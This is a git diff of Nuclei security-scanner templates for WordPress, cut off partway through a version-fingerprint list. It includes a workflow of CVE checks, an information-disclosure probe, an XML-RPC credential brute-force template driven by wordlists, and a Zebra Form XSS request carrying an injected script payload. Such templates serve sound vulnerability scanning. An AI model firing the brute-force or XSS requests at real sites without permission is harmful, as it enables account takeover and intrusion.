wordpress-workflow info: name: Wordpress Security Checks - author: kiblyn11,zomsop82 + author: foulenzer description: A simple workflow that runs all wordpress related nuclei templates on a given target. + # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) + # Old workflows still remains valid, and will be working with all nuclei versions. + workflows: - - template: technologies/wordpress-detect.yaml - subtemplates: - - tags: wordpress \ No newline at end of file + - template: /root/foulenzer-templates/wp-detect.yaml + matchers: + - name: wordpress + subtemplates: + - template: cves/2019/CVE-2019-15858.yaml + - template: cves/2019/CVE-2019-6715.yaml + - template: cves/2019/CVE-2019-9978.yaml + - template: vulnerabilities/wordpress/easy-wp-smtp-listing.yaml + - template: vulnerabilities/wordpress/sassy-social-share.yaml + - template: vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml + - template: vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml + - template: vulnerabilities/wordpress/wordpress-db-backup.yaml + - template: vulnerabilities/wordpress/wordpress-debug-log.yaml + - template: vulnerabilities/wordpress/wordpress-emails-verification-for-woocommerce.yaml + - template: vulnerabilities/wordpress/wordpress-emergency-script.yaml + - template: vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml + - template: vulnerabilities/wordpress/wordpress-wordfence-xss.yaml + - template: vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml \ No newline at end of file diff --git a/nuclei-templates/Other/wordpress-wpcourses-info-disclosure-11369.yaml b/nuclei-templates/Other/wordpress-wpcourses-info-disclosure-11369.yaml new file mode 100644 index 0000000000..4a0d110f9c --- /dev/null +++ b/nuclei-templates/Other/wordpress-wpcourses-info-disclosure-11369.yaml @@ -0,0 +1,36 @@ +id: wordpress-wpcourses-info-disclosure + +info: + name: WordPress WP Courses Plugin Information Disclosure + author: dwisiswant0 + severity: high + description: Critical Information Disclosure on WP Courses plugin < 2.0.29 exposes private course videos and materials + tags: wordpress,plugin + reference: + - https://www.exploit-db.com/exploits/48910 + - https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/ + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-json/wp/v2/lesson/1" + + matchers-condition: and + matchers: + - type: regex + regex: + - "rest_post_invalid_id" + - "\"(guid|title|content|excerpt)\":{\"rendered\":" + condition: or + part: body + + - type: word + words: + - "application/json" + part: header + + - type: status + status: + - 200 + - 404 + condition: or \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-26876.yaml b/nuclei-templates/Other/wordpress-wpcourses-info-disclosure-11370.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-26876.yaml rename to nuclei-templates/Other/wordpress-wpcourses-info-disclosure-11370.yaml diff --git a/nuclei-templates/Other/wordpress-wpcourses-info-disclosure.yaml b/nuclei-templates/Other/wordpress-wpcourses-info-disclosure.yaml deleted file mode 100644 index 0776e3445f..0000000000 --- a/nuclei-templates/Other/wordpress-wpcourses-info-disclosure.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: wordpress-wpcourses-info-disclosure -info: - name: WordPress WP Courses Plugin Information Disclosure - author: dwisiswant0 - severity: high - description: Critical Information Disclosure on WP Courses plugin < 2.0.29 exposes private course videos and materials - tags: wordpress,plugin - reference: - - https://www.exploit-db.com/exploits/48910 - - https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/ -requests: - - method: GET - path: - - "{{BaseURL}}/wp-json/wp/v2/lesson/1" - matchers-condition: and - matchers: - - type: regex - regex: - - "rest_post_invalid_id" - - "\"(guid|title|content|excerpt)\":{\"rendered\":" - condition: or - part: body - - type: word - words: - - "application/json" - part: header - - type: status - status: - - 200 - - 404 - condition: or diff --git a/nuclei-templates/Other/wordpress-xmlrpc-brute-force.yaml b/nuclei-templates/Other/wordpress-xmlrpc-brute-force.yaml new file mode 100644 index 0000000000..26b60896bf --- /dev/null +++ b/nuclei-templates/Other/wordpress-xmlrpc-brute-force.yaml @@ -0,0 +1,45 @@ +id: wordpress-xmlrpc-brute-force +info: + name: Wordpress XMLRPC.php username and password Bruteforcer + author: Exid + severity: high + description: This template bruteforces username and passwords through xmlrpc.php being available. + reference: + - https://bugdasht.ir/reports/3c6841c0-ae4c-11eb-a510-517171a9198c + - https://www.acunetix.com/vulnerabilities/web/wordpress-xml-rpc-authentication-brute-force/ + tags: wordpress,php,xmlrpc,fuzz +requests: + - raw: + - | + POST /xmlrpc.php HTTP/1.1 + Host: {{Hostname}} + Content-Length: 235 + + + + wp.getUsersBlogs + + + {{username}} + + + {{password}} + + + + attack: clusterbomb + payloads: + username: helpers/wordlists/wp-users.txt + password: helpers/wordlists/wp-passwords.txt + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - 'url' + - 'xmlrpc' + - 'isAdmin' + condition: and diff --git a/nuclei-templates/Other/wordpress-xmlrpc-listmethods-11374.yaml b/nuclei-templates/Other/wordpress-xmlrpc-listmethods-11374.yaml new file mode 100644 index 0000000000..ecaeeafa4f --- /dev/null +++ b/nuclei-templates/Other/wordpress-xmlrpc-listmethods-11374.yaml @@ -0,0 +1,26 @@ +id: wordpress-xmlrpc-listmethods +info: + name: Wordpress XML-RPC List System Methods + author: 0ut0fb4nd + severity: info + tags: wordpress + +requests: + - method: POST + path: + - "{{BaseURL}}/xmlrpc.php" + + body: "system.listMethods" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "system.multicall" + - "system.listMethods" + - "demo.sayHello" + condition: and + part: body \ No newline at end of file diff --git a/nuclei-templates/Other/wordpress-xmlrpc-listmethods.yaml b/nuclei-templates/Other/wordpress-xmlrpc-listmethods.yaml deleted file mode 100644 index 4395aef47f..0000000000 --- a/nuclei-templates/Other/wordpress-xmlrpc-listmethods.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: wordpress-xmlrpc-listmethods - -info: - name: Wordpress XML-RPC List System Methods - author: 0ut0fb4nd - severity: info - tags: wordpress - -requests: - - method: POST - path: - - "{{BaseURL}}/xmlrpc.php" - - body: "system.listMethods" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "system.multicall" - - "system.listMethods" - - "demo.sayHello" - condition: and - part: body \ No newline at end of file diff --git a/nuclei-templates/Other/wordpress-zebra-form-xss-11377.yaml b/nuclei-templates/Other/wordpress-zebra-form-xss-11377.yaml deleted file mode 100644 index eb070bb0f2..0000000000 --- a/nuclei-templates/Other/wordpress-zebra-form-xss-11377.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: wordpress-zebra-form-xss - -info: - name: Wordpress Zebra Form XSS - author: madrobot - severity: medium - reference: https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html - tags: wordpress,xss -requests: - - raw: - - | - POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Content-Type: multipart/form-data; boundary=---------------------------77916619616724262872902741074 - Origin: null - - -----------------------------77916619616724262872902741074 - Content-Disposition: form-data; name="upload"; filename="{{randstr}}.txt" - Content-Type: text/plain - Test - -----------------------------77916619616724262872902741074-- - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: status - status: - - 200 - - - type: word - words: - - "text/html" - part: header \ No newline at end of file diff --git a/nuclei-templates/Other/wordpress-zebra-form-xss-11378.yaml b/nuclei-templates/Other/wordpress-zebra-form-xss-11378.yaml new file mode 100644 index 0000000000..bd81293cdb --- /dev/null +++ b/nuclei-templates/Other/wordpress-zebra-form-xss-11378.yaml @@ -0,0 +1,35 @@ +id: wordpress-zebra-form-xss +info: + name: Wordpress Zebra Form - Cross-Site Scripting + author: madrobot + severity: medium + reference: + - https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html + tags: wordpress,xss +requests: + - raw: + - | + POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Content-Type: multipart/form-data; boundary=---------------------------77916619616724262872902741074 + Origin: null + + -----------------------------77916619616724262872902741074 + Content-Disposition: form-data; name="upload"; filename="{{randstr}}.txt" + Content-Type: text/plain + Test + -----------------------------77916619616724262872902741074-- + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: status + status: + - 200 + - type: word + words: + - "text/html" + part: header diff --git a/nuclei-templates/Other/wordpress.yaml b/nuclei-templates/Other/wordpress.yaml deleted file mode 100644 index 9202790171..0000000000 --- a/nuclei-templates/Other/wordpress.yaml +++ /dev/null @@ -1,52062 +0,0 @@ -id: wordpress -info: - name: wordpress_version_fingerprint - severity: info - author: glatisant & erwan -requests: - - method: GET - path: - - "{{BaseURL}}/readme.html" - matchers: - - type: dsl - name: 4.7.8 - 4.9.4 - dsl: - - "(\"092b5391da31c6e8bb02bf4bc03b6b34\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.7 - dsl: - - "(\"fe8cf5b25298130f1b2ed912a5809e33\" == md5(body))" - - type: dsl - name: 4.6.7 - 4.6.8 - dsl: - - "(\"21b68e053d312980ee29e34e2d2a5946\" == md5(body))" - - type: dsl - name: 4.6.6 - dsl: - - "(\"8e9f725564294e07c64765188bf9a3fe\" == md5(body))" - - type: dsl - name: 4.6.5 - dsl: - - "(\"85889315124967dba655231bed63ca66\" == md5(body))" - - type: dsl - name: 4.6.4 - dsl: - - "(\"444385c242de092b106ddce230ed2626\" == md5(body))" - - type: dsl - name: 4.6.3 - dsl: - - "(\"997cfaa41d14c329574ab63128a6d8ef\" == md5(body))" - - type: dsl - name: 4.6.2 - dsl: - - "(\"43c6fcf7a5e24ed469e6ff13b03fe7a3\" == md5(body))" - - type: dsl - name: 4.6.1 - dsl: - - "(\"df0f4d66b59b3338a5d012d52bc435fa\" == md5(body))" - - type: dsl - name: 4.6 - dsl: - - "(\"67ba56403014102858d999ee1667524f\" == md5(body))" - - type: dsl - name: 4.5.9 - dsl: - - "(\"3393eb4e7d645b2a0a31d3b6f5f7c9dd\" == md5(body))" - - type: dsl - name: 4.5.8 - dsl: - - "(\"66a213aad3146927db0f82bc5d460622\" == md5(body))" - - type: dsl - name: 4.5.7 - dsl: - - "(\"1a347a939012e6013e52dd80329db99d\" == md5(body))" - - type: dsl - name: 4.5.6 - dsl: - - "(\"49e8cd983673db23788eab8cfd68b6ce\" == md5(body))" - - type: dsl - name: 4.5.5 - dsl: - - "(\"34945973736fe4690ad8bfd98e6536e0\" == md5(body))" - - type: dsl - name: 4.5.4 - dsl: - - "(\"03f530e9ec1ab1735e062d38149ff4ab\" == md5(body))" - - type: dsl - name: 4.5.3 - dsl: - - "(\"29c8aa59c025e67a8ac1d7a2270859ae\" == md5(body))" - - type: dsl - name: 4.5.2 - dsl: - - "(\"51ddc54e156a2eb1178dde690701afe3\" == md5(body))" - - type: dsl - name: 4.5.10 - 4.5.11 - dsl: - - "(\"edc1c98719dffa3cddfac22dc100f605\" == md5(body))" - - type: dsl - name: 4.5.1 - dsl: - - "(\"5a06021dcac8af1d9790c5a3927d5235\" == md5(body))" - - type: dsl - name: 4.5 - dsl: - - "(\"7abbf8d3edc718acefcbe963ecb4eb61\" == md5(body))" - - type: dsl - name: 4.4.9 - dsl: - - "(\"5bfaba705cf6ed2704d911443f116049\" == md5(body))" - - type: dsl - name: 4.4.8 - dsl: - - "(\"f13e86c96001ab7dc004e7e7364f3976\" == md5(body))" - - type: dsl - name: 4.4.7 - dsl: - - "(\"c17af93c54f5e0f82f7d522b23254a01\" == md5(body))" - - type: dsl - name: 4.4.6 - dsl: - - "(\"95cf7c3c42b0fba340e4ba9c7c637dfc\" == md5(body))" - - type: dsl - name: 4.4.5 - dsl: - - "(\"d7d38b02f37be897fca290cfacfba50a\" == md5(body))" - - type: dsl - name: 4.4.4 - dsl: - - "(\"02c45477bc7ab7d9ab792919f41833cc\" == md5(body))" - - type: dsl - name: 4.4.3 - dsl: - - "(\"bb98b2cfe4e40d32280f8e79f18a3171\" == md5(body))" - - type: dsl - name: 4.4.2 - dsl: - - "(\"c17664e85bfe1b94a71597f49af06f77\" == md5(body))" - - type: dsl - name: 4.4.11 - 4.4.12 - dsl: - - "(\"41239be0065fa9d0afb246efcc9f782c\" == md5(body))" - - type: dsl - name: 4.4.10 - dsl: - - "(\"109d8930d992a36f805ac0a342c5b2e1\" == md5(body))" - - type: dsl - name: 4.4.1 - dsl: - - "(\"4aa090adebb81f9d0aeb38e1fd9ce2ec\" == md5(body))" - - type: dsl - name: 4.4 - dsl: - - "(\"30d62b21a621e81280b10e73945a5c38\" == md5(body))" - - type: dsl - name: 4.3.9 - dsl: - - "(\"1ee25af3ea3fc41b19cc3ffe032bb7e2\" == md5(body))" - - type: dsl - name: 4.3.8 - dsl: - - "(\"2a7f4dc8bd52d5d2e0cdea58d5949bff\" == md5(body))" - - type: dsl - name: 4.3.7 - dsl: - - "(\"01d23a48d9f2397d36dffd8d3cd2a83a\" == md5(body))" - - type: dsl - name: 4.3.6 - dsl: - - "(\"3d896637a80f2816b92684ae9276cddd\" == md5(body))" - - type: dsl - name: 4.3.5 - dsl: - - "(\"f957307acd12e95204a2c383272ce0fd\" == md5(body))" - - type: dsl - name: 4.3.4 - dsl: - - "(\"06c8085308f4e22411c477710338518c\" == md5(body))" - - type: dsl - name: 4.3.3 - dsl: - - "(\"324635de8b1d97e1e51d22b2dd79d472\" == md5(body))" - - type: dsl - name: 4.3.2 - dsl: - - "(\"80e2027d2ae1394172820adc117d51af\" == md5(body))" - - type: dsl - name: 4.3.12 - 4.3.13 - dsl: - - "(\"730ab685dd9a1742275818cdb3e44643\" == md5(body))" - - type: dsl - name: 4.3.11 - dsl: - - "(\"2489eed974e0d786eb3ca1798bf1c20a\" == md5(body))" - - type: dsl - name: 4.3.10 - dsl: - - "(\"caceccdf6f23dcfa5aa582b307d9929c\" == md5(body))" - - type: dsl - name: 4.3.1 - dsl: - - "(\"29c26e3150a452ccea556ee308935691\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"0d302db33ba0e49aaac1698423ef4b54\" == md5(body))" - - type: dsl - name: 4.2.9 - dsl: - - "(\"7346ab0a4d46d23cef6b6888a0727260\" == md5(body))" - - type: dsl - name: 4.2.8 - dsl: - - "(\"6adca796716ba77896b2a68c16ae99f2\" == md5(body))" - - type: dsl - name: 4.2.7 - dsl: - - "(\"60598928e506e91491f9322e94cf52a6\" == md5(body))" - - type: dsl - name: 4.2.6 - dsl: - - "(\"3296a741eaf6388b41f2b1e3d78783b8\" == md5(body))" - - type: dsl - name: 4.2.5 - dsl: - - "(\"37e612ca4b342f682e0ad48b78de6cc9\" == md5(body))" - - type: dsl - name: 4.2.4 - dsl: - - "(\"31053c9e79e9e63bc76b8eb92f68ec75\" == md5(body))" - - type: dsl - name: 4.2.3 - dsl: - - "(\"3ed7c1a6e718ccce554978fdaab6526a\" == md5(body))" - - type: dsl - name: 4.2.2 - dsl: - - "(\"8592124f91d6da8273fc42b419f384b0\" == md5(body))" - - type: dsl - name: 4.2.16 - 4.2.17 - dsl: - - "(\"b78ccf8b524dcd2f9706d919d036e61a\" == md5(body))" - - type: dsl - name: 4.2.15 - dsl: - - "(\"622cdb329b1b5b5a6f5d76988df4272c\" == md5(body))" - - type: dsl - name: 4.2.14 - dsl: - - "(\"2fa1bad18fb6dde791717f130373dc56\" == md5(body))" - - type: dsl - name: 4.2.13 - dsl: - - "(\"987eb46a501ec849f3f901e81b5b1871\" == md5(body))" - - type: dsl - name: 4.2.12 - dsl: - - "(\"6cdc477ceb7d6bba951928c2445823aa\" == md5(body))" - - type: dsl - name: 4.2.11 - dsl: - - "(\"ddf7eb2aae278ab3a355aa248f9d8209\" == md5(body))" - - type: dsl - name: 4.2.10 - dsl: - - "(\"162ee7badad63243dfe7c4679af1c019\" == md5(body))" - - type: dsl - name: 4.2.1 - dsl: - - "(\"f18dcf7c554efc0b197d2a320e5cd248\" == md5(body))" - - type: dsl - name: 4.2 - dsl: - - "(\"ded215e7acec9f6d04f3e370f486d3aa\" == md5(body))" - - type: dsl - name: 4.1.9 - dsl: - - "(\"db5c7b4f7bab8f481dbc78262bb92c2b\" == md5(body))" - - type: dsl - name: 4.1.8 - dsl: - - "(\"97fa4d86c9b424b8810f872d1803d118\" == md5(body))" - - type: dsl - name: 4.1.7 - dsl: - - "(\"f91912f2fad5f1383927c9e98d3a7746\" == md5(body))" - - type: dsl - name: 4.1.6 - dsl: - - "(\"0b91870a4cc0857bbcd9c140791ddede\" == md5(body))" - - type: dsl - name: 4.1.5 - dsl: - - "(\"30215f440132ce7414c4c48d1f520767\" == md5(body))" - - type: dsl - name: 4.1.4 - dsl: - - "(\"21584d9435d82fd371904611a7e25289\" == md5(body))" - - type: dsl - name: 4.1.3 - dsl: - - "(\"60ce7d3fed721c23cc46c7aaa77c1df8\" == md5(body))" - - type: dsl - name: 4.1.2 - dsl: - - "(\"58c2fe4eb8b7866abb8912dc7fc2f616\" == md5(body))" - - type: dsl - name: 4.1.19 - 4.1.20 - dsl: - - "(\"f66b292419a257a80d989a878fae8f8e\" == md5(body))" - - type: dsl - name: 4.1.18 - dsl: - - "(\"2822d4dc7ca874e3d1e76fd7c514efcc\" == md5(body))" - - type: dsl - name: 4.1.17 - dsl: - - "(\"405dedbfeec91210f7bab16575b56035\" == md5(body))" - - type: dsl - name: 4.1.16 - dsl: - - "(\"6767e3998a33bb43d004fab866af06c2\" == md5(body))" - - type: dsl - name: 4.1.15 - dsl: - - "(\"f2ed0468d9ca40932e96ebe77e773762\" == md5(body))" - - type: dsl - name: 4.1.14 - dsl: - - "(\"93d4cbf103b49ad6998f6a480519ced6\" == md5(body))" - - type: dsl - name: 4.1.13 - dsl: - - "(\"fb4c2052b147355ba0b658d7860c37a5\" == md5(body))" - - type: dsl - name: 4.1.12 - dsl: - - "(\"6c1415726fe2f04ad0157c6174d1f734\" == md5(body))" - - type: dsl - name: 4.1.11 - dsl: - - "(\"b0289dd7b86fb56f07708bb14f3795fc\" == md5(body))" - - type: dsl - name: 4.1.10 - dsl: - - "(\"04815654ef433ae5b019786e7c3753f1\" == md5(body))" - - type: dsl - name: 4.1.1 - dsl: - - "(\"ce78b2213f70701834658c9007f0c947\" == md5(body))" - - type: dsl - name: 4.1 - dsl: - - "(\"321aad4ba63043f888cb072cedf9ef78\" == md5(body))" - - type: dsl - name: 4.0.9 - dsl: - - "(\"288f36185879e687f7cae3a7a41f8d6c\" == md5(body))" - - type: dsl - name: 4.0.8 - dsl: - - "(\"009dd49817e70b9859b50d7d7e2b8152\" == md5(body))" - - type: dsl - name: 4.0.7 - dsl: - - "(\"4ad554f864ffaf1ac491a610ba054e49\" == md5(body))" - - type: dsl - name: 4.0.6 - dsl: - - "(\"62a283e6ecb4bb247123392312469b40\" == md5(body))" - - type: dsl - name: 4.0.5 - dsl: - - "(\"1adf30a1d6fe172f37da7dca83496c7d\" == md5(body))" - - type: dsl - name: 4.0.4 - dsl: - - "(\"85a6b662f1733509acb224c273897b24\" == md5(body))" - - type: dsl - name: 4.0.3 - dsl: - - "(\"411d19aaa3bb5d45f8aa8714575ee48b\" == md5(body))" - - type: dsl - name: 4.0.2 - dsl: - - "(\"ed8777afffc86285afc57984da43fdbd\" == md5(body))" - - type: dsl - name: 4.0.19 - 4.0.20 - dsl: - - "(\"4445478174fb84e1d0a1b2e14a7327c7\" == md5(body))" - - type: dsl - name: 4.0.18 - dsl: - - "(\"17b05be902fc20a3d2428d41e01edf43\" == md5(body))" - - type: dsl - name: 4.0.17 - dsl: - - "(\"8a91b1b0d5a535fe165bdf254ebdb40e\" == md5(body))" - - type: dsl - name: 4.0.16 - dsl: - - "(\"1d0ce532b0158c58560b8018f461d5d3\" == md5(body))" - - type: dsl - name: 4.0.15 - dsl: - - "(\"e53f13483b321b874cdb48b644a83ed1\" == md5(body))" - - type: dsl - name: 4.0.14 - dsl: - - "(\"84d35f2059bd5466c4f95cb632e710f3\" == md5(body))" - - type: dsl - name: 4.0.13 - dsl: - - "(\"01054cfb251b2bd00dc51f3a1c4beb5d\" == md5(body))" - - type: dsl - name: 4.0.12 - dsl: - - "(\"21a788d3e8b7945c20a47b975b3fc915\" == md5(body))" - - type: dsl - name: 4.0.11 - dsl: - - "(\"1b7fdd91e1cea1cb18779262e7b13dd0\" == md5(body))" - - type: dsl - name: 4.0.10 - dsl: - - "(\"ac4edd239f424cd811d0bb0097354405\" == md5(body))" - - type: dsl - name: 4.0.1 - dsl: - - "(\"70cdb035f3dd51138d5997eaa4d93798\" == md5(body))" - - type: dsl - name: 4.0 - dsl: - - "(\"f00855fca05f89294d0fcee6bebea64a\" == md5(body))" - - type: dsl - name: 3.9.9 - dsl: - - "(\"87f4b1dd4ea5e17b30233722077adb0c\" == md5(body))" - - type: dsl - name: 3.9.8 - dsl: - - "(\"c4371f9433505dd8cea5f03bf5e6c328\" == md5(body))" - - type: dsl - name: 3.9.7 - dsl: - - "(\"1a6acdaa1de27568ce672ff9748914e0\" == md5(body))" - - type: dsl - name: 3.9.6 - dsl: - - "(\"2e7463a0999c6495b6d1c79a48c81d46\" == md5(body))" - - type: dsl - name: 3.9.5 - dsl: - - "(\"57b9f0931f2da4389af92e07bc702505\" == md5(body))" - - type: dsl - name: 3.9.4 - dsl: - - "(\"38466bbd5205e09d8bbb4e46bfd4aec5\" == md5(body))" - - type: dsl - name: 3.9.3 - dsl: - - "(\"62a78170a740a4460a8d25e00c1839f5\" == md5(body))" - - type: dsl - name: 3.9.20 - 3.9.21 - dsl: - - "(\"50321fc2a768254650e69e0b4562473e\" == md5(body))" - - type: dsl - name: 3.9.2 - dsl: - - "(\"dfb2d2be1648ee220bf9bd3c03694ed8\" == md5(body))" - - type: dsl - name: 3.9.19 - dsl: - - "(\"43a22d7b481375d78386c9593fd1eb77\" == md5(body))" - - type: dsl - name: 3.9.18 - dsl: - - "(\"00a16ead6ba35a470f68fe6a3aa56210\" == md5(body))" - - type: dsl - name: 3.9.17 - dsl: - - "(\"606d396504f13604794ec78b9d6bbd03\" == md5(body))" - - type: dsl - name: 3.9.16 - dsl: - - "(\"8f4d451aeead063e6367c9d5dcd02ee7\" == md5(body))" - - type: dsl - name: 3.9.15 - dsl: - - "(\"e61db9d4bdf4493d01f93b7f2d31b7aa\" == md5(body))" - - type: dsl - name: 3.9.14 - dsl: - - "(\"38cbc7bd229691e2f7570f39e2ed79f0\" == md5(body))" - - type: dsl - name: 3.9.13 - dsl: - - "(\"ae364ca23dae20cbdbfa5f861aa70e13\" == md5(body))" - - type: dsl - name: 3.9.12 - dsl: - - "(\"5cb6e5fcb570702e99792352d0288a8a\" == md5(body))" - - type: dsl - name: 3.9.11 - dsl: - - "(\"342344249a8f5cbfb205262aaf353a16\" == md5(body))" - - type: dsl - name: 3.9.10 - dsl: - - "(\"d517492c730895ce405875758f5942b3\" == md5(body))" - - type: dsl - name: 3.9.1 - dsl: - - "(\"cdbf9b18e3729b3553437fc4e9b6baad\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"84b54c54aa48ae72e633685c17e67457\" == md5(body))" - - type: dsl - name: 3.8.9 - dsl: - - "(\"38ce781f075385a61979a705ee120de6\" == md5(body))" - - type: dsl - name: 3.8.8 - dsl: - - "(\"eef2236f174830a5ea4ef6346c9b6d23\" == md5(body))" - - type: dsl - name: 3.8.7 - dsl: - - "(\"0f74cf5708da39cb3c86dc49c8f276c8\" == md5(body))" - - type: dsl - name: 3.8.6 - dsl: - - "(\"ad646c841cf11f2dc8a8f76f65e4ca42\" == md5(body))" - - type: dsl - name: 3.8.5 - dsl: - - "(\"4821f33f92f597623a524a34f3be4651\" == md5(body))" - - type: dsl - name: 3.8.4 - dsl: - - "(\"fb73e4ab558adc3948adf2653e28d880\" == md5(body))" - - type: dsl - name: 3.8.3 - dsl: - - "(\"c6de8fc70a18be7e5c36198cd0f99a64\" == md5(body))" - - type: dsl - name: 3.8.22 - 3.8.23 - dsl: - - "(\"9ef246991d6fb8db9688e941fc09fff9\" == md5(body))" - - type: dsl - name: 3.8.21 - dsl: - - "(\"306425f612332d620df886472c5eb1df\" == md5(body))" - - type: dsl - name: 3.8.20 - dsl: - - "(\"034d1d6b0408ccc3a3a18314ad8503da\" == md5(body))" - - type: dsl - name: 3.8.2 - dsl: - - "(\"e01a2663475f6a7a8363a7c75a73fe23\" == md5(body))" - - type: dsl - name: 3.8.19 - dsl: - - "(\"dcf9f4bb18fb35da77d9870d522e236b\" == md5(body))" - - type: dsl - name: 3.8.18 - dsl: - - "(\"39364ff8391782cbd182e7061b3db3fe\" == md5(body))" - - type: dsl - name: 3.8.17 - dsl: - - "(\"3c06b96336ba61373c24ad5f6c4f6e52\" == md5(body))" - - type: dsl - name: 3.8.16 - dsl: - - "(\"fbf520feecde27820e9f27ed409440d5\" == md5(body))" - - type: dsl - name: 3.8.15 - dsl: - - "(\"3abfa03d4f3a5a52f55ddc31fc536933\" == md5(body))" - - type: dsl - name: 3.8.14 - dsl: - - "(\"e55306288cf2edc63e25414fbb22de37\" == md5(body))" - - type: dsl - name: 3.8.13 - dsl: - - "(\"6d479ec8dfb4917d96f3cee805cd36ae\" == md5(body))" - - type: dsl - name: 3.8.12 - dsl: - - "(\"2d2914c37b51e6f266ab50b561574dd6\" == md5(body))" - - type: dsl - name: 3.8.11 - dsl: - - "(\"5bbd02dd56f85902dfe6f79081bc1e14\" == md5(body))" - - type: dsl - name: 3.8.10 - dsl: - - "(\"ebdf3445a03dca2d2f3d4097a3db9e30\" == md5(body))" - - type: dsl - name: 3.8.1 - dsl: - - "(\"0d0eb101038124a108f608d419387b92\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"38ee273095b8f25b9ffd5ce5018fc4f0\" == md5(body))" - - type: dsl - name: 3.7.9 - dsl: - - "(\"24316a634083214fd1c4b99472ef8fbd\" == md5(body))" - - type: dsl - name: 3.7.8 - dsl: - - "(\"2bc39c43b8540a7fedeb7bbd9de1ce58\" == md5(body))" - - type: dsl - name: 3.7.7 - dsl: - - "(\"c40340aad98640725093e05797056bd2\" == md5(body))" - - type: dsl - name: 3.7.6 - dsl: - - "(\"b9ebf4eb4a24be0bd82094da0baf13cf\" == md5(body))" - - type: dsl - name: 3.7.5 - dsl: - - "(\"61f1e5fbbd9ecb69c90cb96a19160ae5\" == md5(body))" - - type: dsl - name: 3.7.4 - dsl: - - "(\"dc09e38cb48fbbec5b5f990513b491e4\" == md5(body))" - - type: dsl - name: 3.7.3 - dsl: - - "(\"813e06052daa0692036e60d76d7141d3\" == md5(body))" - - type: dsl - name: 3.7.22 - 3.7.23 - dsl: - - "(\"07f33efaba18b0292d26e7319b8f40f7\" == md5(body))" - - type: dsl - name: 3.7.21 - dsl: - - "(\"d0b935c4bd9daa500ee76b6a911abb07\" == md5(body))" - - type: dsl - name: 3.7.20 - dsl: - - "(\"01d1cb3de3ab503530218d06a39fd02e\" == md5(body))" - - type: dsl - name: 3.7.2 - dsl: - - "(\"b3a05c7a344c2f53cb6b680fd65a91e8\" == md5(body))" - - type: dsl - name: 3.7.19 - dsl: - - "(\"77de437f7578bc09cec06e7938606ecd\" == md5(body))" - - type: dsl - name: 3.7.18 - dsl: - - "(\"7b43ecac59a1bfe0f1a943bcccc827ef\" == md5(body))" - - type: dsl - name: 3.7.17 - dsl: - - "(\"fffe9145a1435352e5fda177eb7ab8d8\" == md5(body))" - - type: dsl - name: 3.7.16 - dsl: - - "(\"c6719b2bf475a6adfc49fd309935d0f4\" == md5(body))" - - type: dsl - name: 3.7.15 - dsl: - - "(\"43687e50ed6f31595eb912e27716c130\" == md5(body))" - - type: dsl - name: 3.7.14 - dsl: - - "(\"87926a66b3e42919c6d47fe9d8655287\" == md5(body))" - - type: dsl - name: 3.7.13 - dsl: - - "(\"81fc07a5d7ffed7de5523d31787718ae\" == md5(body))" - - type: dsl - name: 3.7.12 - dsl: - - "(\"848745041001ecc0833a5cb09d9e1240\" == md5(body))" - - type: dsl - name: 3.7.11 - dsl: - - "(\"375f2e632c542152037551a335fda8c4\" == md5(body))" - - type: dsl - name: 3.7.10 - dsl: - - "(\"985a1a42445325fc2f7d6bd121d19696\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.1 - dsl: - - "(\"4717bf89e299ff054760ec8b0768c9e1\" == md5(body))" - - type: dsl - name: 3.6.1 - dsl: - - "(\"e82f4fe7d3c1166afb4c00856b875f16\" == md5(body))" - - type: dsl - name: 3.6 - dsl: - - "(\"477f1e652f31dae76a38e3559c91deb9\" == md5(body))" - - type: dsl - name: 3.5.2 - dsl: - - "(\"caf7946275c3e885419b1d36b22cb5f3\" == md5(body))" - - type: dsl - name: 3.5.1 - dsl: - - "(\"05d50a04ef19bd4b0a280362469bf22f\" == md5(body))" - - type: dsl - name: 3.5 - dsl: - - "(\"066cfc0f9b29ae6d491aa342ebfb1b71\" == md5(body))" - - type: dsl - name: 3.4.2 - dsl: - - "(\"c6514a15e04bd9ec96df4d9b78c17bc5\" == md5(body))" - - type: dsl - name: 3.4.1 - dsl: - - "(\"9ecbb128295ac324f63a6adc0b6e78ea\" == md5(body))" - - type: dsl - name: 3.4 - dsl: - - "(\"34b3071c2c48f0b1a611c2ee9f1b3516\" == md5(body))" - - type: dsl - name: 3.3.3 - dsl: - - "(\"36b2b72a0f22138a921a38db890d18c1\" == md5(body))" - - type: 